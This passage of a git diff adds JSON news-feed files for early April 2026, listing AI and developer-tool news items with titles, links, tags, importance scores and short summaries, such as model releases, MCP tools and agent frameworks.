Abstract: Knowledge distillation is typically realized by transferring a teacher model's knowledge into a student's parameters through supervised or reinforcement-based optimization. 
While effective, such approaches require repeated parameter updates and large-scale training data, limiting their applicability in resource-constrained environments. In this work, we propose TED, a training-free, context-based distillation framework that shifts the update target of distillation from model parameters to an in-context experience injected into the student's prompt. For each input, the student generates multiple reasoning trajectories, while a teacher independently produces its own solution. The teacher then compares the student trajectories with its reasoning and the ground-truth answer, extracting generalized experiences that capture effective reasoning patterns. These experiences are continuously refined and updated over time. A key challenge of context-based distillation is unbounded experience growth and noise accumulation. TED addresses this with an experience compression mechanism that tracks usage statistics and selectively merges, rewrites, or removes low-utility experiences. Experiments on multimodal reasoning benchmarks MathVision and VisualPuzzles show that TED consistently improves performance. On MathVision, TED raises the performance of Qwen3-VL-8B from 0.627 to 0.702, and on VisualPuzzles from 0.517 to 0.561 with just 100 training samples. 
Under this low-data, no-update setting, TED achieves performance competitive with fully trained parameter-based distillation while reducing training cost by over 5x, demonstrating that meaningful knowledge transfer can be achieved through contextual experience.", + "category": "ai_research" + }, + { + "title": "EpochX: Building the Infrastructure for an Emergent Agent Civilization", + "url": "https://arxiv.org/abs/2603.27304", + "source": "ArXiv cs.AI", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-03-31T04:00:00.000Z", + "summary": "arXiv:2603.27304v1 Announce Type: new Abstract: General-purpose technologies reshape economies less by improving individual tools than by enabling new ways to organize production and coordination. We believe AI agents are approaching a similar inflection point: as foundation models make broad task execution and tool use increasingly accessible, the binding constraint shifts from raw capability to how work is delegated, verified, and rewarded at scale. We introduce EpochX, a credits-native marketplace infrastructure for human-agent production networks. EpochX treats humans and agents as peer participants who can post tasks or claim them. Claimed tasks can be decomposed into subtasks and executed through an explicit delivery workflow with verification and acceptance. Crucially, EpochX is designed so that each completed transaction can produce reusable ecosystem assets, including skills, workflows, execution traces, and distilled experience. These assets are stored with explicit dependency structure, enabling retrieval, composition, and cumulative improvement over time. EpochX also introduces a native credit mechanism to make participation economically viable under real compute costs. Credits lock task bounties, budget delegation, settle rewards upon acceptance, and compensate creators when verified assets are reused. 
By formalizing the end-to-end transaction model together with its asset and incentive layers, EpochX reframes agentic AI as an organizational design problem: building infrastructures where verifiable work leaves persistent, reusable artifacts, and where value flows support durable human-agent collaboration.", + "category": "ai_research" + }, + { + "title": "Bitboard version of Tetris AI", + "url": "https://arxiv.org/abs/2603.26765", + "source": "ArXiv cs.AI", + "tags": [ + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-03-31T04:00:00.000Z", + "summary": "arXiv:2603.26765v1 Announce Type: new Abstract: The efficiency of game engines and policy optimization algorithms is crucial for training reinforcement learning (RL) agents in complex sequential decision-making tasks, such as Tetris. Existing Tetris implementations suffer from low simulation speeds, suboptimal state evaluation, and inefficient training paradigms, limiting their utility for large-scale RL research. To address these limitations, this paper proposes a high-performance Tetris AI framework based on bitboard optimization and improved RL algorithms. First, we redesign the Tetris game board and tetrominoes using bitboard representations, leveraging bitwise operations to accelerate core processes (e.g., collision detection, line clearing, and Dellacherie-Thiery Features extraction) and achieve a 53-fold speedup compared to OpenAI Gym-Tetris. Second, we introduce an afterstate-evaluating actor network that simplifies state value estimation by leveraging Tetris afterstate property, outperforming traditional action-value networks with fewer parameters. Third, we propose a buffer-optimized Proximal Policy Optimization (PPO) algorithm that balances sampling and update efficiency, achieving an average score of 3,829 on 10x10 grids within 3 minutes. 
Additionally, we develop a Python-Java interface compliant with the OpenAI Gym standard, enabling seamless integration with modern RL frameworks. Experimental results demonstrate that our framework enhances Tetris's utility as an RL benchmark by bridging low-level bitboard optimizations with high-level AI strategies, providing a sample-efficient and computationally lightweight solution for scalable sequential decision-making research.", + "category": "ai_research" + }, + { + "title": "Together AI Brings NVIDIA Nemotron 3 to Developers on Day 0", + "url": "https://www.together.ai/blog/nvidia-nemotron-3-super", + "source": "Together AI Blog", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-03-11T00:00:00.000Z", + "summary": "NVIDIA Nemotron 3 Super is now available on Together AI Dedicated Inference, delivering efficient multi-agent reasoning, a 1M-token context window, and production-grade deployment on managed infrastructure.", + "category": "ai_tools" + }, + { + "title": "Together Evaluations now supports comparing top commercial APIs vs. open source models", + "url": "https://www.together.ai/blog/together-evaluations-v2", + "source": "Together AI Blog", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-02-02T00:00:00.000Z", + "summary": "Together Evaluations now supports OpenAI, Anthropic, and Google models for cross-provider benchmarking. 
Compare open-source, fine-tuned, and proprietary models side-by-side to make data-driven decisions on quality, cost, and performance—all in one platform.", + "category": "ai_tools" + }, + { + "title": "Introducing deploy cli", + "url": "https://blog.langchain.com/introducing-deploy-cli/", + "source": "LangChain Blog", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.69, + "date": "2026-03-16T17:20:21.000Z", + "summary": "We’re excited to introduce the deploy cli, a new set of commands within the langgraph-cli package that makes it simple to deploy and manage agents directly from the command line. The first command in this new set, langgraph deploy , lets you deploy an agent to LangSmith Deployment in", + "category": "ai_agents" + }, + { + "title": "Introducing LangSmith Sandboxes: Secure Code Execution for Agents", + "url": "https://blog.langchain.com/introducing-langsmith-sandboxes-secure-code-execution-for-agents/", + "source": "LangChain Blog", + "tags": [ + "api_update", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "developer_tool" + ], + "importance": 0.62, + "date": "2026-03-17T15:51:07.000Z", + "summary": "Spin up a sandbox in a single line of code with the LangSmith SDK. 
Now in Private Preview.", + "category": "ai_agents" + }, + { + "title": "Open SWE: An Open-Source Framework for Internal Coding Agents", + "url": "https://blog.langchain.com/open-swe-an-open-source-framework-for-internal-coding-agents/", + "source": "LangChain Blog", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.62, + "date": "2026-03-17T15:30:00.000Z", + "summary": "Built on Deep Agents and LangGraph, Open SWE provides the core architectural components for internal coding agents.", + "category": "ai_agents" + }, + { + "title": "Exclusive: Runway launches $10M fund, Builders program to support early-stage AI startups", + "url": "https://techcrunch.com/2026/03/31/exclusive-runway-launches-10m-fund-builders-program-to-support-early-stage-ai-startups/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-03-31T14:00:00.000Z", + "summary": "Runway is launching a $10 million fund and startup program to back companies building with its AI video models, as it pushes toward interactive, real-time “video intelligence” applications.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-01.json b/data/news-feed-2026-04-01.json new file mode 100644 index 0000000..3d3bdd2 --- /dev/null +++ b/data/news-feed-2026-04-01.json @@ -0,0 +1,253 @@ +{ + "generated": "2026-06-05T00:44:31.735Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-01", + "article_count": 15, + "archived_story_count": 894, + "articles": [ + { + "title": "MiniMax Releases M2.1: An Enhanced M2 Version with Features like Multi-Coding Language Support, API Integration, and Improved Tools for Structured Coding", + "url": 
"https://www.marktechpost.com/2025/12/25/minimax-releases-m2-1-an-enhanced-m2-version-with-features-like-multi-coding-language-support-api-integration-and-improved-tools-for-structured-coding/", + "source": "MarkTechPost", + "tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "matching_tags": [ + "api_update", + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.743Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Agent-Infra Releases AIO Sandbox: An All-in-One Runtime for AI Agents with Browser, Shell, Shared Filesystem, and MCP", + "url": "https://www.marktechpost.com/2026/03/29/agent-infra-releases-aio-sandbox-an-all-in-one-runtime-for-ai-agents-with-browser-shell-shared-filesystem-and-mcp/", + "source": "MarkTechPost", + "tags": [ + "mcp", + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "product_launch", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.720Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "UT Austin and ServiceNow Research Team Releases AU-Harness: An Open-Source Toolkit for Holistic Evaluation of Audio LLMs", + "url": "https://www.marktechpost.com/2025/09/14/ut-austin-and-servicenow-research-team-releases-au-harness-an-open-source-toolkit-for-holistic-evaluation-of-audio-llms/", + "source": "MarkTechPost", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.737Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Google AI Releases Veo 3.1 Lite: Giving Developers Low Cost High Speed Video Generation via The Gemini API", + "url": "https://www.marktechpost.com/2026/03/31/google-ai-releases-veo-3-1-lite-giving-developers-low-cost-high-speed-video-generation-via-the-gemini-api/", + "source": "MarkTechPost", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + 
"api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.724Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Improve coding agents’ performance with Gemini API Docs MCP and Agent Skills.", + "url": "https://blog.google/innovation-and-ai/technology/developers-tools/gemini-api-docsmcp-agent-skills/", + "source": "Google AI Blog", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-04-01T09:34:55.903Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "AnnouncementsFeb 5, 2026Introducing Claude Opus 4.6We’re upgrading our smartest model. Across agentic coding, computer use, tool use, search, and finance, Opus 4.6 is an industry-leading model, often by wide margin.", + "url": "https://www.anthropic.com/news/claude-opus-4-6", + "source": "Anthropic News", + "tags": [ + "api_update", + "agent_tool" + ], + "matching_tags": [ + "api_update", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-01T09:34:54.348Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "Show HN: CLI to order groceries via reverse-engineered REWE API (Haskell)", + "url": "https://github.com/yannick-cw/korb", + "source": "Hacker News", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.74, + "date": "2026-03-30T06:45:58.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Stability AI Announces Investment from WPP and New Partnership to Shape the Future of Media and Entertainment Production", + "url": "https://stability.ai/news-updates/stability-ai-announces-investment-from-wpp-and-new-partnership-to-shape-the-future-of-media-and-entertainment-production", + "source": "Stability AI Blog", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-01T09:35:11.176Z", + "summary": null, + 
"category": "creative_tools" + }, + { + "title": "NVIDIA Releases New AI Models and Developer Tools to Advance Autonomous Vehicle Ecosystem", + "url": "https://blogs.nvidia.com/blog/autonomous-vehicle-ecosystem-ai-models-developer-tools/", + "source": "NVIDIA AI Blog", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-01T09:35:05.180Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "An Implementation of IWE’s Context Bridge as an AI-Powered Knowledge Graph with Agentic RAG, OpenAI Function Calling, and Graph Traversal", + "url": "https://www.marktechpost.com/2026/03/27/an-implementation-of-iwes-context-bridge-as-an-ai-powered-knowledge-graph-with-agentic-rag-openai-function-calling-and-graph-traversal/", + "source": "MarkTechPost", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.747Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "How to Design a Fully Functional Enterprise AI Assistant with Retrieval Augmentation and Policy Guardrails Using Open Source AI Models", + "url": "https://www.marktechpost.com/2025/10/22/how-to-design-a-fully-functional-enterprise-ai-assistant-with-retrieval-augmentation-and-policy-guardrails-using-open-source-ai-models/", + "source": "MarkTechPost", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.735Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Salesforce AI Research Releases VoiceAgentRAG: A Dual-Agent Memory Router that Cuts Voice RAG Retrieval Latency by 316x", + "url": "https://www.marktechpost.com/2026/03/30/salesforce-ai-research-releases-voiceagentrag-a-dual-agent-memory-router-that-cuts-voice-rag-retrieval-latency-by-316x/", + "source": "MarkTechPost", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 
1, + "date": "2026-04-01T09:35:03.718Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Hugging Face Releases TRL v1.0: A Unified Post-Training Stack for SFT, Reward Modeling, DPO, and GRPO Workflows", + "url": "https://www.marktechpost.com/2026/04/01/hugging-face-releases-trl-v1-0-a-unified-post-training-stack-for-sft-reward-modeling-dpo-and-grpo-workflows/", + "source": "MarkTechPost", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-01T09:35:03.710Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Salesforce announces an AI-heavy makeover for Slack, with 30 new features", + "url": "https://techcrunch.com/2026/03/31/salesforce-announces-an-ai-heavy-makeover-for-slack-with-30-new-features/", + "source": "TechCrunch AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-01T09:34:58.227Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "How I contributed a new model to the Transformers library using Codex 1 day ago • 34", + "url": "https://huggingface.co/blog/nielsr/contributing-to-transformers-with-codex", + "source": "Hugging Face Blog", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-04-01T09:34:55.910Z", + "summary": null, + "category": "ai_models" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-02.json b/data/news-feed-2026-04-02.json new file mode 100644 index 0000000..d7ef7ba --- /dev/null +++ b/data/news-feed-2026-04-02.json @@ -0,0 +1,181 @@ +{ + "generated": "2026-06-05T00:44:32.037Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-02", + "article_count": 11, + "archived_story_count": 120, + "articles": [ + { + "title": "Google releases Gemma 4 under Apache 2.0 — and that license change may matter more than benchmarks", + "url": 
"https://venturebeat.com/technology/google-releases-gemma-4-under-apache-2-0-and-that-license-change-may-matter", + "source": "VentureBeat AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-04-02T18:00:23.348Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Cursor Launches a New AI Agent Experience to Take On Claude Code and Codex", + "url": "https://www.wired.com/story/cusor-launches-coding-agent-openai-anthropic/", + "source": "Wired AI", + "tags": [ + "product_launch", + "agent_tool" + ], + "matching_tags": [ + "product_launch", + "agent_tool" + ], + "importance": 1, + "date": "2026-04-02T18:00:15.314Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Google announces Gemma 4 open AI models, switches to Apache 2.0 license", + "url": "https://arstechnica.com/ai/2026/04/google-announces-gemma-4-open-ai-models-switches-to-apache-2-0-license/", + "source": "Ars Technica AI", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 0.98, + "date": "2026-04-02T18:00:16.217Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Z.ai Launches GLM-5V-Turbo: A Native Multimodal Vision Coding Model Optimized for OpenClaw and High-Capacity Agentic Engineering Workflows Everywhere", + "url": "https://www.marktechpost.com/2026/04/01/z-ai-launches-glm-5v-turbo-a-native-multimodal-vision-coding-model-optimized-for-openclaw-and-high-capacity-agentic-engineering-workflows-everywhere/", + "source": "MarkTechPost", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-02T06:00:27.059Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "IBM Announces Strategic Collaboration with Arm", + "url": 
"https://newsroom.ibm.com/2026-04-02-ibm-announces-strategic-collaboration-with-arm-to-shape-the-future-of-enterprise-computing", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.98, + "date": "2026-04-02T08:48:44.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "IBM Releases Granite 4.0 3B Vision: A New Vision Language Model for Enterprise Grade Document Data Extraction", + "url": "https://www.marktechpost.com/2026/04/01/ibm-releases-granite-4-0-3b-vision-a-new-vision-language-model-for-enterprise-grade-document-data-extraction/", + "source": "MarkTechPost", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9, + "date": "2026-04-02T18:00:19.625Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "Google releases Gemma 4 open models", + "url": "https://deepmind.google/models/gemma/gemma-4/", + "source": "Hacker News", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.9, + "date": "2026-04-02T16:10:54.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Lemonade by AMD: a fast and open source local LLM server using GPU and NPU", + "url": "https://lemonade-server.ai", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.8200000000000001, + "date": "2026-04-02T11:04:51.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Artemis II, NASA's boldest mission in generations, launches crew to the Moon", + "url": "https://arstechnica.com/space/2026/04/four-astronauts-depart-for-the-moon-with-a-fiery-send-off-from-cape-canaveral/", + "source": "Ars Technica AI", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 0.6599999999999999, + "date": "2026-04-02T18:00:16.230Z", + "summary": null, + "category": 
"tech_general" + }, + { + "title": "Delve allegedly forked an open-source tool and sold it as its own", + "url": "https://techcrunch.com/2026/04/01/the-reputation-of-troubled-yc-startup-delve-has-gotten-even-worse/", + "source": "Hacker News", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 0.6599999999999999, + "date": "2026-04-02T15:03:08.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Python API usage", + "url": "https://github.com/datasette/datasette-llm/blob/0.1a6/README.md#usage", + "source": "Simon Willison's Blog", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.6599999999999999, + "date": "2026-04-02T06:00:31.526Z", + "summary": null, + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-03.json b/data/news-feed-2026-04-03.json new file mode 100644 index 0000000..2773b50 --- /dev/null +++ b/data/news-feed-2026-04-03.json @@ -0,0 +1,119 @@ +{ + "generated": "2026-06-05T00:44:32.201Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-03", + "article_count": 7, + "archived_story_count": 351, + "articles": [ + { + "title": "Arcee AI Releases Trinity Large Thinking: An Apache 2.0 Open Reasoning Model for Long-Horizon Agents and Tool Use", + "url": "https://www.marktechpost.com/2026/04/02/arcee-ai-releases-trinity-large-thinking-an-apache-2-0-open-reasoning-model-for-long-horizon-agents-and-tool-use/", + "source": "MarkTechPost", + "tags": [ + "api_update", + "product_launch", + "open_source" + ], + "matching_tags": [ + "api_update", + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-04-03T06:00:57.447Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "TII Releases Falcon Perception: A 0.6B-Parameter Early-Fusion Transformer for Open-Vocabulary Grounding and Segmentation from Natural Language Prompts", + "url": 
"https://www.marktechpost.com/2026/04/03/tii-releases-falcon-perception-a-0-6b-parameter-early-fusion-transformer-for-open-vocabulary-grounding-and-segmentation-from-natural-language-prompts/", + "source": "MarkTechPost", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-04-03T14:05:05.318Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "New ways to balance cost and reliability in the Gemini API", + "url": "https://blog.google/innovation-and-ai/technology/developers-tools/introducing-flex-and-priority-inference/", + "source": "Google AI Blog", + "tags": [ + "api_update" + ], + "matching_tags": [ + "api_update" + ], + "importance": 0.94, + "date": "2026-04-03T06:00:46.321Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "C89cc.sh – standalone C89/ELF64 compiler in pure portable shell", + "url": "https://gist.github.com/alganet/2b89c4368f8d23d033961d8a3deb5c19", + "source": "Hacker News", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.74, + "date": "2026-04-01T08:41:49.000Z", + "summary": null, + "category": "tech_general" + }, + { + "title": "Your Agent Has 12 Blind Spots You Can't See Yet. This Audit Prompt Finds Them. 
(+ Skill Package)", + "url": "https://natesnewsletter.substack.com/p/your-agent-has-12-blind-spots-you", + "source": "Nate's Newsletter", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.6799999999999999, + "date": "2026-04-03T14:05:06.150Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Google Vids extension", + "url": "https://chromewebstore.google.com/detail/google-vids-screen-record/iklnnbgdcppplombffihcijanngoeifm", + "source": "The Verge AI", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.6799999999999999, + "date": "2026-04-03T06:01:01.783Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "Post Mortem: axios NPM supply chain compromise", + "url": "https://github.com/axios/axios/issues/10636", + "source": "Simon Willison's Blog", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 0.6799999999999999, + "date": "2026-04-03T00:00:19.000Z", + "summary": null, + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-04.json b/data/news-feed-2026-04-04.json new file mode 100644 index 0000000..cd76d7c --- /dev/null +++ b/data/news-feed-2026-04-04.json @@ -0,0 +1,87 @@ +{ + "generated": "2026-06-05T00:44:32.356Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-04", + "article_count": 5, + "archived_story_count": 236, + "articles": [ + { + "title": "@CloudflareDev — Gemma 4 Just Landed on Cloudflare Workers AI — 256K Context, Tool Calling, Vision", + "url": "https://x.com/CloudflareDev/status/2040459229039940068", + "source": "Aligned News (Scoble)", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-04-04T16:20:03.318Z", + "summary": "@CloudflareDev announces Gemma 4 is now on Workers AI — MoE model with 26B total and 4B 
active parameters, 256K context window, tool calling, reasoning, and vision capabilities.", + "category": "ai_tools" + }, + { + "title": "YC-Bench: Can Your AI Agent Run a Startup Without Going Bankrupt? 2 days ago • 3", + "url": "https://huggingface.co/blog/collinear-ai/yc-bench", + "source": "Hugging Face Blog", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-04-04T18:00:25.574Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "@synthwavedd — GPT Image 2 Stealth Launched — Significant Quality Upgrade for All ChatGPT Users", + "url": "https://x.com/synthwavedd/status/2040442540508287101", + "source": "Aligned News (Scoble)", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-04-04T16:20:03.318Z", + "summary": "@synthwavedd reports GPT Image 2 has been stealth launched on ChatGPT — all image generations now routing to the new model. A significant quality upgrade with no announcement.", + "category": "ai_tools" + }, + { + "title": "Components of A Coding Agent", + "url": "https://magazine.sebastianraschka.com/p/components-of-a-coding-agent", + "source": "Sebastian Raschka", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-04-04T18:00:27.636Z", + "summary": null, + "category": "ai_research" + }, + { + "title": "RAG-Anything: All-in-One RAG Framework", + "url": "https://paperswithcode.com/papers/2510.12323", + "source": "Papers With Code", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 0.76, + "date": "2026-04-04T06:00:23.350Z", + "summary": null, + "category": "ai_research" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-04-05.json b/data/news-feed-2026-04-05.json new file mode 100644 index 0000000..bd95cd6 --- /dev/null +++ b/data/news-feed-2026-04-05.json @@ -0,0 +1,261 @@ +{ + 
"generated": "2026-06-05T00:44:32.524Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-04-05", + "article_count": 15, + "archived_story_count": 210, + "articles": [ + { + "title": "Improved markdown quality, code intelligence for 248 languages, and more in Kreuzberg v4.7.0", + "url": "https://reddit.com/r/LocalLLaMA/comments/1scv46p/improved_markdown_quality_code_intelligence_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "developer_tool", + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "developer_tool", + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-04-05T05:17:04.000Z", + "summary": "Kreuzberg v4.7.0 is here. Kreuzberg is a Rust-core document intelligence library that works with Python, TypeScript/Node.js, Go, Ruby, Java, C#, PHP, Elixir, R, C, and WASM. \n\nWe’ve added several features, integrated OpenWEBUI, and made a big improvement in quality across all formats. There is also a new markdown rendering layer and new HTML output, which we now support. And much more (which you can find in our [the release notes](https://github.com/kreuzberg-dev/kreuzberg/releases)).\n\nThe main ", + "category": "ai_models" + }, + { + "title": "[P] Cadenza: Connect Wandb logs to agents easily for autonomous research.", + "url": "https://reddit.com/r/MachineLearning/comments/1scm9do/p_cadenza_connect_wandb_logs_to_agents_easily_for/", + "source": "Reddit r/MachineLearning", + "tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-04-04T22:09:24.000Z", + "summary": "Wandb CLI and MCP is atrocious to use with agents for full autonomous research loops. 
They are slow, clunky, and result in context rot.\n\nSo I built a CLI tool and a Python SDK to make it easy to connect your Wandb projects and runs to your agent (clawed or otherwise).\n\n \nThe cli tool works by allowing you to import your wandb projects and structures your runs in a way that makes it easy for agents to get a sense of the solution space of your research project.\n\nWhen projects are imported, only t", + "category": "ai_research" + }, + { + "title": "I built an open-source tool that lets Claude Code and Claude Desktop control Unreal Engine — 60+ operations, zero editor clicks", + "url": "https://reddit.com/r/ClaudeAI/comments/1scvnt8/i_built_an_opensource_tool_that_lets_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "open_source", + "developer_tool", + "cli_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-04-05T05:47:58.000Z", + "summary": "I wanted Claude to actually *do things* inside Unreal Engine, not just write code and hope it compiles. So I built soft-ue-cli.\n\nIt's a Python tool + a C++ plugin that runs inside UE. Claude sends commands, UE executes them. Two ways to use it:\n\n* **Claude Code** — runs `soft-ue-cli` commands in the terminal\n* **Claude Desktop / Cursor / Windsurf** — connects via MCP (`soft-ue-cli mcp-serve`)\n\nHere's what a typical session looks like. 
I ask Claude to \"inspect the player Blueprint and add a healt", + "category": "ai_tools" + }, + { + "title": "Running OpenClaw with Gemma 4 TurboQuant on MacAir 16GB", + "url": "https://reddit.com/r/LocalLLaMA/comments/1sciyfg/running_openclaw_with_gemma_4_turboquant_on/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-04-04T19:54:55.000Z", + "summary": "Hi guys,\n\nWe’ve implemented a one-click app for OpenClaw with Local Models built in. It includes TurboQuant caching, a large context window, and proper tool calling. It runs on mid-range devices. Free and Open source.\n\nThe biggest challenge was enabling a local agentic model to run on average hardware like a Mac Mini or MacBook Air. Small models work well on these devices, but agents require more sophisticated models like QWEN or GLM. OpenClaw adds a large context to each request, which caused t", + "category": "ai_models" + }, + { + "title": "Claude Code via VSCode extension still uses more tokens than Claude Code via terminal", + "url": "https://reddit.com/r/ClaudeAI/comments/1scsl84/claude_code_via_vscode_extension_still_uses_more/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.8600000000000001, + "date": "2026-04-05T03:05:56.000Z", + "summary": "Last night was the first time I maxed out my max plan session limits simply by trying out Claude Code directly in VSCode. Even on low effort, it seems to chew through tokens while essentially being the same as Claude Code via terminal. 
